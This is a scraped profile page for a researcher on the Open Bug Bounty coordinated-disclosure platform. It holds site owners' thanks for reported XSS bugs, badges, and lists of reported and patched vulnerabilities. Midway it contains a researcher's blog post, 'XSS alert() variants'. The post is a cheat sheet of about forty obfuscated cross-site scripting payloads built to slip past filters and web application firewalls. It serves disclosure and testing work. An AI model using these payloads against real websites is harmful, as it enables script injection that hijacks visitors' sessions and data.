Coordinated and Responsible Vulnerability Disclosure Free Bug Bounty Program 420,110 coordinated disclosures
228,414 fixed vulnerabilities
567 bug bounties with 1108 websites
11,373 researchers, 932 honor badges

Gh05tPT Top Security Researcher of the Month Top VIP Security Researcher of the Month | Security Researcher Profile


Security researcher Gh05tPT has already helped fix 4538 vulnerabilities.



Researcher reputation:  560

Real name:
#Gh05tPT #inurlBR #Ch3rn0bylH4ck3r5 #aCCESS

About me:
http://blog.inurl.com.br/

How to contact me:
https://twitter.com/Gh05tPT
[email protected]
http://blog.inurl.com.br/
https://facebook.com/podzemie4544
https://facebook.com/exchangesec/

Alternative Contacts:
http://blog.inurl.com.br/

Experience in Application Security
over 5 years

Award / Bug Bounty I prefer:
A thanks/profile recommendation will be really appreciated, but if you'd like:
paypal.me/Gh05tPT
# Bug Bounty ($$$)
# Hall Of Fame
# T-shirts, Sweats, Caps, Stickers, Keychains, etc

Halls of Fame:
https://www.pejadesign.com/chi-siamo/chi-siamo#manyThanks.
https://unite.un.org/content/hall-fame

Follow me on:
Twitter
Facebook

Recommendations and Acknowledgements | Full List:

    21 August, 2019
     aaccomazzi Alberto Accomazzi from Center for Astrophysics:
One more XSS bug discovered and patched thanks to Gh05tPT. Much appreciated!
    3 August, 2019
     NewLineHorizon1 Melisa from NewLineHorizon:
Dear,

Thanks for participating in responsible disclosure program.
The reports you submitted were extremely helpful to our team and provided us the details we needed to resolve the issues that you identified.
We are deeply committed to provide a safe and secure experience to our users and are therefore grateful for your efforts to help us improve our services.

Best Regards!
    12 June, 2019
     tony_marston Tony Marston from Radicore Software Limited:
Gh05tPT found a XSS vulnerability on my site which I was able to fix quite quickly. Thanks for your help.
    12 June, 2019
     CapaniAntonio Antonio Capani from Nibbles.it s.r.l.:
Gh05tPT found a XSS vulnerability on one of our sites. We will fix it on the next version of our CMS. Thank you very much for your help!
    24 May, 2019
     aaccomazzi Alberto Accomazzi from Center for Astrophysics:
Gh05tPT helped us discover and fix an XSS vulnerability on our website. Much appreciated!
    16 May, 2019
     Admeus Master from EVS:
Gh05tPT found a XSS vulnerability on our website, which was promptly resolve with his help. Really good communication and sympathy. Thanks
    10 May, 2019
     rjbica Ricardo from XWS:
Gh05tPT found a XSS issue in one of our systems and provided us the technical details to help solve the problem. Thanks!
    3 May, 2019
     pkissman Paul Kissman from Massachusetts Board of Library Commissioners:
Gh05tPT found a basic XSS vulnerability on our website. Some javascript could be entered as a parameter in a GET query and though it wouldn't be processed as form data, it could be reflected out again (unescaped) on the search results page.

Thanks very much Gh05tPT.
    27 February, 2019
     ChabadoneY Yossi from Chabad.org:
Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help!
    27 February, 2019
     ChabadoneY Yossi from Chabad.org:
Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help!
    7 February, 2019
     VTCMagazine1 Andy from Mudconnect.com:
Thank you for helping mudconnect by reporting the XSS vulnerability Gh05tPT!
    7 February, 2019
     L2JDrLecter Ariel Graneros from Poder Judicial:
Gh05tPT found a security problem in one of our services. Once contacted he responded quickly and professionally. Thank you very much!
    28 November, 2018
     ProdestComunica Eric from Prodest:
Thanks to @Gh05tPT for helping us to increase the security of one of our web applications. Keep up the good work!
    28 November, 2018
     RodrigoFaustini Rodrigo Faustini from Private:
@Gh05tPT reported a XXS vulnerability on our site. Thank you very much!
    19 September, 2018
     franciscomesa Francisco Mesa from ELR:
Gh05tPT found a XSS vulnerability on our website and was quick to respond with technical detail. It's cool to find online researchers with this efficient profile.
    13 September, 2018
     AppsecDiligent Joel Kerr from Diligent:
Really appreciate your help in detecting and helping us resolve our XSS issue. We were able to communicate together and get it fixed within a weeks time. Thanks again!
    7 September, 2018
     MohammedSultanM Sultan from NBA:
Thank you Gh05tPT for the amazing job on pinpointing a weakness on one of our websites!
    4 September, 2018
     aaccomazzi Alberto Accomazzi from NASA Astrophysics Data System:
Thank you Gh05tPT for pointing out a security issue on our server, appreciate your work!
    23 August, 2018
     NickTheNight78 Nicola La Notte from dpconsulenze S.r.l.:
Thanks Gh05tPT for reporting us the issue on our website, we check and solve. Very good work.
    12 August, 2018
     OMABrowser Adrian Altenhoff from OMA Browser:
Thanks to @Gh05tPT for reported bug and helpful feedback to solve the vulnerability.
    6 August, 2018
     jrsaysthxalot jrsayThxALot :
Thanks a lot for reported bug by Gh05tPT. Very fast response and very helpfully. Keep up the great work!
    4 August, 2018
     alesom77 alesom77 from ArpaPiemonte:
Gh05tPT found a security problem on one of our servers. I recommend him because he responded quickly and professionally. Thank you very much.
    2 August, 2018
     webmarkeurope Developer from COS:
Gh05tPT found a XSS vulnerability on our websites and was quick to respond to an email with technical detail. Thank you for that.
    1 August, 2018
     armando_caruso Armando Caruso from SID:
Gh05tPT found a XSS vulnerability on our websites and was quick to respond to an email with tecnical detail.
    19 July, 2018
     promatik António Almeida from Gema Digital:
Em nome da Animais de Rua, obrigado pela ajuda!
Gh05tPT encontrou um problema na página, respondeu rapidamente às perguntas colocadas e ajudou a resolver o problema.
Obrigado!
    19 July, 2018
     ssauer14 ssauer :
Thanks a lot, it is great when people help each other.
Keep up the good work.
    19 July, 2018
     goodyear0005 Matt from Interactechnology:
Gh05tPT found a XSS vulnerability on our websites and was quick to respond to an email. We appreciated his help very much.
    18 July, 2018
     scrum_master Alexander Kriegisch from ---:
Thanks for the helpful and friendly communication with me on behalf of the web site owner I was checking this issue for with you. Keep up the good work.
    17 July, 2018
     aaccomazzi Alberto Accomazzi from Center for Astrophysics:
Gh05tPT discovered an XSS vulnerability on our website and communicated the details to us very promptly. We are very grateful to him for his assistance and advice.
    17 July, 2018
     Lordskynner Jerri Dick from Isso Tecnologia:
Thx for reported bug @Gh05tPT, quick to respond and helpfull do solve vulnerability
    3 July, 2018
     shus_work Shuzo Masuyama from ARPAK:
こんにちは Mr.Gh05tPT

脆弱性の指摘をいただき、感謝いたします。
あなたのおかげで、私達のwebサイトのセキュリティを強化することができます。
    29 June, 2018
     zeroFiG Mark Cameron from Enhanced Integrated Framework:
Gh05tPT was quick to respond, very polite and helpful during the resolution of the XSS vulnerability.

A kind thank you from the team.
    21 June, 2018
     AhgoraS Fernando from Ahgora:
We thank you for your colaboration and responsible disclosure!
    12 June, 2018
     Jorg3 Jorge Reis from Caixatec:
Thanks for your colaboration!!!
    4 June, 2018
     pejadesign Gabriele from Peja Design:
Gh05tPT found an XSS bug on my website. Many Thanks!
    30 May, 2018
     creampai Kaoru Iwata from Time Intermedia:
こんにちは、ミスターGh05tPT

脆弱性の詳細を教えてくれてありがとう。
あなたの行動のお陰で、私たちのサイトのセキュリティが向上します。

私はセキュリティアップデートを適用する予定です。

Please login via Twitter to add a recommendation

Honor Badges


Number of Secured Websites

10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN
1000+ Websites

Advanced Security Research

WAF Bypasser
CSRF Master
30+ Reports
AppSec Logic Master
30+ Reports
Fastest Fix
Fix in 24 hours

Outstanding Achievements

Secured OBB
OBB Advocate
Improved OBB

Commitment to Remediate and Patch

Patch Master
55% Patched
Patch Guru
65% Patched
Patch Lord
75% Patched

Recommendations and Recognition

REPUTABLE
10+ Recommends
FAMOUS
25+ Recommends
GLOBALLY TRUSTED
50+ Recommends

Distinguished Blog Author

1 Post
3 Posts
5+ Posts

Research Statistics



Total reports:14859
Total reports on VIP sites:217
Total patched vulnerabilities:4538
Total vulnerabilities on Hold (Open Bug Bounty):3697
Recommendations received:36
Active since:05.04.2018
Top Security Researcher Awards: Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month
Top VIP Security Researcher Awards: Top VIP Security Researcher of the Month Top VIP Security Researcher of the Week

Open Bug Bounty Certificate



04.04.2019  XSS alert() variants

<script>prompt(1)</script> 
<script>confirm(1)</script>
<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script> <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script> <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script> <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script> <script>throw~delete~typeof~prompt(1)</script> <script>delete[a=alert]/prompt a(1)</script> <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script> <script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script> <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script> <script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script> <script>Array.from`${eval}alert\`1\``</script> <script>Array.from([1],alert)</script> <script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u> <videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script> <script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script> <script>x=new class extends Function{}('alert(1)'); x=new x;</script> <script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script> <script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1) <svg><script/xlink:href=data:,alert(1)></script> <frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>

Reported Vulnerabilities

All Submissions VIP Submissions

Domain Reported Status Type
20.08.2019
On Hold
Cross Site Scripting
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Cross Site Scripting
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect
20.08.2019
On Hold
Open Redirect

  Latest Patched

 22.08.2019 akc.org
 22.08.2019 scielo.org
 22.08.2019 gamer-info.com
 22.08.2019 tjrs.jus.br
 22.08.2019 fnde.gov.br
 22.08.2019 casinosolverde.pt
 22.08.2019 1111.com.tw
 22.08.2019 wtop.com
 22.08.2019 fedex.com
 22.08.2019 photobucket.com

  Latest Blog Posts

19.08.2019 by ismailtsdln
IBM - Cross site Scripting [XSS]
15.08.2019 by thevivekkryadav
HOW I WAS BYPASSED CLOUDFLARE WAF
13.08.2019 by Renzi25031469
XSSCon - XSS Tool @Kitploit
13.08.2019 by Cur1S3
I Found a multiple xss on https://clickmeeting.com
13.08.2019 by ZIKADS
xss at anghami.com

  Recent Recommendations

    21 August, 2019
     aaccomazzi:
One more XSS bug discovered and patched thanks to Gh05tPT. Much appreciated!
    21 August, 2019
     SelectLine_GmbH:
Thank you, Rooghz, for pointing out a vulnerability on one of our websites.
    20 August, 2019
     runlevelone:
Thank you for the reported vulnerability! I thought I had those XSS pitfalls covered, but aparently not.
    20 August, 2019
     fukubacchi:
Thanks for reporting the issue and the vulnerability details!!!
    19 August, 2019
     maxiorel:
Thanks for reporting the problem and the vulnerability details.